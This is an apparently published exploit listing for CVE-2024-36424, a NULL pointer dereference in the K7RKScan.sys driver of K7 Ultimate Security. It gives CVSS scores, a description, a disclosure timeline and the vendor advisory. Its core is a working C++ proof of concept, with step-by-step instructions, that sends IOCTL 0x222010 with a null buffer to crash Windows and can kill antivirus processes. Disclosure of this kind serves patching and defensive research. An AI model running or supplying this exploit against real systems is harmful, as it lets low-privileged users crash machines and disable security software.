Lucene search

K
packetstormM. Akil GündoğanPACKETSTORM:180137
HistoryAug 14, 2024 - 12:00 a.m.

K7 Ultimate Security NULL Pointer Dereference

2024-08-1400:00:00
M. Akil Gündoğan
packetstormsecurity.com
77
k7 ultimate security
null pointer dereference
denial of service
unauthorized access
cve-2024-36424
windows 10
k7rkscan.sys

CVSS3

5.5

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

AI Score

7.1

Confidence

Low

`# Title: K7 Ultimate Security < v17.0.2019 "K7RKScan.sys" Null Pointer Dereference   
# Date: 13.08.2024  
# Author: M. Akil Gündoğan   
# Vendor Homepage: https://k7computing.com/  
# Version: < v17.0.2019  
# Tested on: Windows 10 Pro x64  
# CVE ID: CVE-2024-36424  
  
# Vulnerability Description:  
--------------------------------------  
In K7 Ultimate Security < v17.0.2019, the driver file (K7RKScan.sys - this version 15.1.0.7) allows local users to cause a denial of service (BSOD) or possibly have unspecified other impact because of null pointer dereference from IOCtl 0x222010 and 0x222014. At the same time, the drive is accessible to all users in the "Everyone" group.  
  
# Technical details and step by step Proof of Concept's (PoC):  
--------------------------------------  
1 - Install the driver in the path "C:\Program Files (x86)\K7 Computing\K7TSecurity\K7TSecurity\64Bit\K7RKScan.sys" to the system via OSRLoader or sc create.  
  
2 - Compile the attached PoC code written in C++ as release on VS 2022.   
  
3 - Run the compiled PoC directly with a double click. You will see the system crash/BSOD.  
  
# Impact:  
--------------------------------------  
An attacker with unauthorized user access can cause the entire system to crash and terminate critical processes, including any antivirus process where the relevant driver is activated and used on the system.  
  
# Advisories:  
--------------------------------------  
K7 Computing recommends that all customers update their products to the corresponding versions shown below:  
  
K7 Ultimate Security (17.0.2019 or Higher)  
  
# Timeline:  
--------------------------------------  
- 16.05.2024 - Vulnerability reported.  
- 05.08.2024 - Vendor has fixed the vulnerability.  
- 13.08.2024 - Released.  
  
# References:  
--------------------------------------  
- Vendor: https://www.k7computing.com  
- Advisory: https://support.k7computing.com/index.php?/selfhelp/view-article/Advisory-issued-on-5th-aug-2024-417  
- CVE: https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-36424  
- Repository: https://github.com/secunnix/CVE-2024-36424  
  
# PoC Code (C++):  
-------------------------------------------------------------------------------------------------------------------------  
  
/*  
# Usage: Only compile it and run, boooom :)  
*/  
  
#include <windows.h>  
#include <iostream>  
  
const std::wstring driverDevice = L"\\\\.\\DosK7RKScnDrv"; // K7RKScan.sys symbolic link path  
const DWORD ioCTL = 0x222010; // IOCTL 0x222010 or 0x222014  
  
int main() {  
std::cout << "K7 Ultimae Security < v17.0.2019 K7RKScan.sys Null Pointer Dereference - PoC" << std::endl;  
HANDLE hDevice = CreateFile(driverDevice.c_str(),  
GENERIC_READ | GENERIC_WRITE,  
0,  
nullptr,  
OPEN_EXISTING,  
0,  
nullptr);  
  
if (hDevice == INVALID_HANDLE_VALUE) {  
std::cerr << "Failed, please load driver and check again. Exit... " << GetLastError() << std::endl;  
return 1;  
}  
  
void* inputBuffer = nullptr; // Null input buffer  
DWORD inputBufferSize = 0;  
  
DWORD bytesReturned;  
BOOL result = DeviceIoControl(hDevice,  
ioCTL,  
inputBuffer,  
inputBufferSize,  
nullptr,  
0,  
&bytesReturned,  
nullptr);  
  
if (!result) {  
std::cerr << "DeviceIoControl failed. Exit... " << GetLastError() << std::endl;  
}  
  
CloseHandle(hDevice);  
  
return 0;  
}  
  
`

CVSS3

5.5

Attack Vector

LOCAL

Attack Complexity

LOW

Privileges Required

LOW

User Interaction

NONE

Scope

UNCHANGED

Confidentiality Impact

NONE

Integrity Impact

NONE

Availability Impact

HIGH

CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H

AI Score

7.1

Confidence

Low

Related for PACKETSTORM:180137